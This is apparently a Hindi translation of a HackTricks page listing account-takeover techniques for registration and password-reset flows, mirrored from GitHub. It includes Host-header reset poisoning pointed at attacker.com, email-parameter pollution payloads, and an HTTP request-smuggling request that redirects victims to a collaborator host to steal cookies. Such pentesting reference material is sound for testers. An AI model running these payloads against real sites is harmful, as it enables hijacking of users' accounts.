mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
202 lines
16 KiB
Markdown
202 lines
16 KiB
Markdown
# पंजीकरण और अधिग्रहण संवेदनशीलताएँ
|
|
|
|
<details>
|
|
|
|
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
|
|
|
HackTricks का समर्थन करने के अन्य तरीके:
|
|
|
|
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें!
|
|
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
|
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
|
|
* **अपनी हैकिंग तरकीबें साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
|
|
|
|
</details>
|
|
|
|
## पंजीकरण अधिग्रहण
|
|
|
|
### डुप्लिकेट पंजीकरण
|
|
|
|
* मौजूदा उपयोगकर्ता नाम का उपयोग करके उत्पन्न करने का प्रयास करें
|
|
* ईमेल में विविधता जांचें:
|
|
* अपरकेस
|
|
* \+1@
|
|
* ईमेल में कुछ जोड़ें
|
|
* ईमेल नाम में विशेष अक्षर (%00, %09, %20)
|
|
* ईमेल के बाद काले अक्षर डालें: `test@test.com a`
|
|
* victim@gmail.com@attacker.com
|
|
* victim@attacker.com@gmail.com
|
|
|
|
### उपयोगकर्ता नाम सूचीकरण
|
|
|
|
जांचें कि क्या आप पता लगा सकते हैं जब एक उपयोगकर्ता नाम पहले से ही एप्लिकेशन के अंदर पंजीकृत हो चुका है।
|
|
|
|
### पासवर्ड नीति
|
|
|
|
एक उपयोगकर्ता बनाते समय पासवर्ड नीति की जांच करें (जांचें कि क्या आप कमजोर पासवर्ड का उपयोग कर सकते हैं).\
|
|
उस स्थिति में आप प्रमाणीकरण को ब्रूटफोर्स करने का प्रयास कर सकते हैं।
|
|
|
|
### SQL इंजेक्शन
|
|
|
|
[**इस पृष्ठ की जांच करें**](sql-injection/#insert-statement) पंजीकरण फॉर्म में **SQL इंजेक्शन** के माध्यम से खाता अधिग्रहण या जानकारी निकालने का प्रयास करने के लिए।
|
|
|
|
### Oauth अधिग्रहण
|
|
|
|
{% content-ref url="oauth-to-account-takeover.md" %}
|
|
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
|
|
{% endcontent-ref %}
|
|
|
|
### SAML संवेदनशीलताएँ
|
|
|
|
{% content-ref url="saml-attacks/" %}
|
|
[saml-attacks](saml-attacks/)
|
|
{% endcontent-ref %}
|
|
|
|
### ईमेल बदलें
|
|
|
|
पंजीकृत होने पर ईमेल बदलने का प्रयास करें और जांचें कि क्या यह परिवर्तन सही ढंग से मान्य है या आप इसे मनमाने ईमेल में बदल सकते हैं।
|
|
|
|
### अधिक जांच
|
|
|
|
* जांचें कि क्या आप **डिस्पोजेबल ईमेल** का उपयोग कर सकते हैं
|
|
* **लंबा** **पासवर्ड** (>200) **DoS** का कारण बनता है
|
|
* **खाता निर्माण पर दर सीमा की जांच करें**
|
|
* username@**burp\_collab**.net का उपयोग करें और **कॉलबैक** का विश्लेषण करें
|
|
|
|
## **पासवर्ड रीसेट अधिग्रहण**
|
|
|
|
### पासवर्ड रीसेट टोकन रेफरर के माध्यम से लीक <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
|
|
|
|
1. अपने ईमेल पते पर पासवर्ड रीसेट का अनुरोध करें
|
|
2. पासवर्ड रीसेट लिंक पर क्लिक करें
|
|
3. पासवर्ड बदलें नहीं
|
|
4. किसी भी तृतीय पक्ष वेबसाइटों पर क्लिक करें (उदाहरण: Facebook, twitter)
|
|
5. Burp Suite प्रॉक्सी में अनुरोध को इंटरसेप्ट करें
|
|
6. जांचें कि क्या रेफरर हेडर पासवर्ड रीसेट टोकन लीक कर रहा है।
|
|
|
|
### पासवर्ड रीसेट जहरीलापन <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
|
|
|
|
1. Burp Suite में पासवर्ड रीसेट अनुरोध को इंटरसेप्ट करें
|
|
2. Burp Suite में निम्नलिखित हेडर्स को जोड़ें या संपादित करें: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
|
|
3. संशोधित हेडर के साथ अनुरोध को आगे बढ़ाएं\
|
|
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
|
|
4. _host header_ के आधार पर पासवर्ड रीसेट URL की तलाश करें जैसे: `https://attacker.com/reset-password.php?token=TOKEN`
|
|
|
|
### ईमेल पैरामीटर के माध्यम से पासवर्ड रीसेट <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
|
|
```powershell
|
|
# parameter pollution
|
|
email=victim@mail.com&email=hacker@mail.com
|
|
|
|
# array of emails
|
|
{"email":["victim@mail.com","hacker@mail.com"]}
|
|
|
|
# carbon copy
|
|
email=victim@mail.com%0A%0Dcc:hacker@mail.com
|
|
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
|
|
|
|
# separator
|
|
email=victim@mail.com,hacker@mail.com
|
|
email=victim@mail.com%20hacker@mail.com
|
|
email=victim@mail.com|hacker@mail.com
|
|
```
|
|
### API पैरामीटर्स पर IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
|
|
|
|
1. हमलावर को अपने खाते से लॉगिन करना होगा और **पासवर्ड बदलें** सुविधा पर जाना होगा।
|
|
2. Burp Suite शुरू करें और अनुरोध को इंटरसेप्ट करें।
|
|
3. इसे रिपीटर टैब पर भेजें और पैरामीटर्स को संपादित करें: उपयोगकर्ता ID/ईमेल\
|
|
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
|
|
|
|
### कमजोर पासवर्ड रीसेट टोकन <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
|
|
|
|
पासवर्ड रीसेट टोकन को यादृच्छिक रूप से उत्पन्न किया जाना चाहिए और हर बार अद्वितीय होना चाहिए।\
|
|
यह निर्धारित करने का प्रयास करें कि टोकन समाप्त होता है या यह हमेशा समान रहता है, कुछ मामलों में उत्पादन एल्गोरिदम कमजोर होता है और अनुमान लगाया जा सकता है। निम्नलिखित चर एल्गोरिदम द्वारा उपयोग किए जा सकते हैं।
|
|
|
|
* Timestamp
|
|
* UserID
|
|
* उपयोगकर्ता का ईमेल
|
|
* प्रथम नाम और उपनाम
|
|
* जन्म तिथि
|
|
* Cryptography
|
|
* केवल संख्या
|
|
* छोटा टोकन अनुक्रम (वर्ण \[A-Z,a-z,0-9] के बीच)
|
|
* टोकन पुन: उपयोग
|
|
* टोकन समाप्ति तिथि
|
|
|
|
### पासवर्ड रीसेट टोकन का लीक होना <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
|
|
|
|
1. एक विशिष्ट ईमेल के लिए API/UI का उपयोग करके पासवर्ड रीसेट अनुरोध ट्रिगर करें, उदाहरण: test@mail.com
|
|
2. सर्वर प्रतिक्रिया की जांच करें और `resetToken` के लिए देखें।
|
|
3. फिर टोकन को एक URL में उपयोग करें जैसे `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
|
|
|
|
### उपयोगकर्ता नाम संघर्ष के माध्यम से पासवर्ड रीसेट <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
|
|
|
|
1. पीड़ित के उपयोगकर्ता नाम के समान एक उपयोगकर्ता नाम के साथ सिस्टम पर रजिस्टर करें, लेकिन उपयोगकर्ता नाम से पहले और/या बाद में सफेद स्थान डालें। उदाहरण: `"admin "`
|
|
2. अपने दुर्भावनापूर्ण उपयोगकर्ता नाम के साथ पासवर्ड रीसेट का अनुरोध करें।
|
|
3. अपने ईमेल पर भेजे गए टोकन का उपयोग करें और पीड़ित का पासवर्ड रीसेट करें।
|
|
4. नए पासवर्ड के साथ पीड़ित खाते में कनेक्ट करें।
|
|
|
|
CTFd प्लेटफॉर्म इस हमले के लिए संवेदनशील था।\
|
|
देखें: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
|
|
|
|
### क्रॉस साइट स्क्रिप्टिंग के माध्यम से खाता अधिग्रहण <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
|
|
|
|
1. एप्लिकेशन के अंदर या एक सबडोमेन में XSS खोजें अगर कुकीज़ मूल डोमेन के लिए स्कोप की गई हैं: `*.domain.com`
|
|
2. वर्तमान **सत्र कुकी** का लीक करें।
|
|
3. कुकी का उपयोग करके उपयोगकर्ता के रूप में प्रमाणित करें।
|
|
|
|
### HTTP अनुरोध स्मगलिंग के माध्यम से खाता अधिग्रहण <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
|
|
|
|
1\. **smuggler** का उपयोग करके HTTP अनुरोध स्मगलिंग के प्रकार का पता लगाएं (CL, TE, CL.TE)\
|
|
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
|
|
2\. एक अनुरोध तैयार करें जो `POST / HTTP/1.1` को निम्नलिखित डेटा के साथ ओवरराइट करेगा:\
|
|
`GET http://something.burpcollaborator.net HTTP/1.1 X:` लक्ष्य के साथ पीड़ितों को burpcollab पर रीडायरेक्ट करने और उनके कुकीज़ चुराने के लिए\
|
|
3\. अंतिम अनुरोध निम्नलिखित की तरह दिख सकता है
|
|
```
|
|
GET / HTTP/1.1
|
|
Transfer-Encoding: chunked
|
|
Host: something.com
|
|
User-Agent: Smuggler/v1.0
|
|
Content-Length: 83
|
|
0
|
|
|
|
GET http://something.burpcollaborator.net HTTP/1.1
|
|
X: X
|
|
```
|
|
Hackerone रिपोर्ट्स इस बग का शोषण करती हैं:
|
|
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)
|
|
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
|
|
|
|
### CSRF के माध्यम से खाता अपहरण <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
|
|
|
|
1. CSRF के लिए पेलोड बनाएं, उदाहरण: “पासवर्ड बदलने के लिए स्वत: सबमिट होने वाला HTML फॉर्म”
|
|
2. पेलोड भेजें
|
|
|
|
### JWT के माध्यम से खाता अपहरण <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
|
|
|
|
JSON Web Token का उपयोग एक उपयोगकर्ता को प्रमाणित करने के लिए किया जा सकता है।
|
|
|
|
* दूसरे उपयोगकर्ता ID / ईमेल के साथ JWT संपादित करें
|
|
* कमजोर JWT हस्ताक्षर की जांच करें
|
|
|
|
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
|
|
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
|
|
{% endcontent-ref %}
|
|
|
|
## संदर्भ
|
|
|
|
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
|
|
|
<details>
|
|
|
|
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>
|
|
|
|
HackTricks का समर्थन करने के अन्य तरीके:
|
|
|
|
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
|
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
|
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
|
|
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
|
|
|
|
</details>
|